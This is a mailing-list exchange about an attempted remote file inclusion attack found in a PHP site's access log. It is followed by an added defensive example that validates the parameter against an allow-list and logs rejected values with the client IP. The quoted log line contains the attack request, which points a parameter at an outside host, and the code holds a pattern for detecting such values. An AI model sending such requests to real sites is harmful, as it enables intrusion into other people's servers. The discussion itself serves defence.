[EMAIL PROTECTED] wrote:
> Hello NYPHP,
> I found the following attempted hack in the access log on one of my sites:
> "GET /index.php?Mode=http://badguyurl.ru/index.html?"
> In this case, the hacker didn't gain access to the site because a
> database script failed instead.
> I would like to be more proactive with trapping this and sending the
> results of the trap back to me so I can track and ban IP addresses
> etc.
> I have a procedure that I hacked for previous exploits but am
> interested now in other options that I may not have used previously.

So what exactly does the parameter Mode do? Isn't this line showing that a
parameter with value got passed to a script with GET? In that case, which
input validation / processing do your scripts have?
David
_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
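
Added example, not part of the original thread and not code from either poster: one way to validate the Mode parameter against an allow-list and record rejected values with the client IP for later review. The page names, the log path and the helper names check_mode() and trap_line() are assumptions.

```php
<?php
declare(strict_types=1);

// Assumptions (not from the thread): the page names and the log file path.
const ALLOWED_MODES = ['home', 'news', 'contact'];
const DEFAULT_MODE  = 'home';
const TRAP_LOG      = '/tmp/mode-trap.log';

// Returns [mode to use, reason to report or null]. Only allow-listed values are ever used.
function check_mode($raw): array
{
    if ($raw === null || $raw === '') {
        return [DEFAULT_MODE, null];
    }
    if (!is_string($raw)) {                        // e.g. ?Mode[]=x arrives as an array
        return [DEFAULT_MODE, 'non-string value'];
    }
    if (in_array($raw, ALLOWED_MODES, true)) {
        return [$raw, null];
    }
    // Scheme-prefixed or protocol-relative values, like the one in the access log.
    if (preg_match('#^([a-z][a-z0-9+.-]*:)?//#i', rawurldecode($raw))) {
        return [DEFAULT_MODE, 'URL-shaped value'];
    }
    return [DEFAULT_MODE, 'unknown value'];
}

// One line per event; control characters and quotes are replaced so a value cannot forge log lines.
function trap_line(string $ip, string $reason, $raw): string
{
    $shown = is_string($raw) ? $raw : gettype($raw);
    $shown = substr((string) preg_replace('/[\x00-\x1F\x7F"]/', '?', $shown), 0, 200);
    return sprintf("%s ip=%s reason=\"%s\" Mode=\"%s\"\n", gmdate('c'), $ip, $reason, $shown);
}

if (PHP_SAPI === 'cli') {
    // Constructed samples; the second is the value from the access log line quoted above.
    foreach (['news', 'http://badguyurl.ru/index.html?', 'nosuchpage', ['x']] as $sample) {
        [$mode, $reason] = check_mode($sample);
        echo $mode, ' <- ', $reason === null ? 'ok' : trim(trap_line('192.0.2.10', $reason, $sample)), "\n";
    }
} else {
    [$mode, $reason] = check_mode($_GET['Mode'] ?? null);
    if ($reason !== null) {
        error_log(trap_line($_SERVER['REMOTE_ADDR'] ?? '-', $reason, $_GET['Mode']), 3, TRAP_LOG);
    }
    // Continue with $mode, which is always one of ALLOWED_MODES.
}
```

Behind a reverse proxy, REMOTE_ADDR is the proxy's address, so any ban list built from this log should use whatever client address the proxy is trusted to supply.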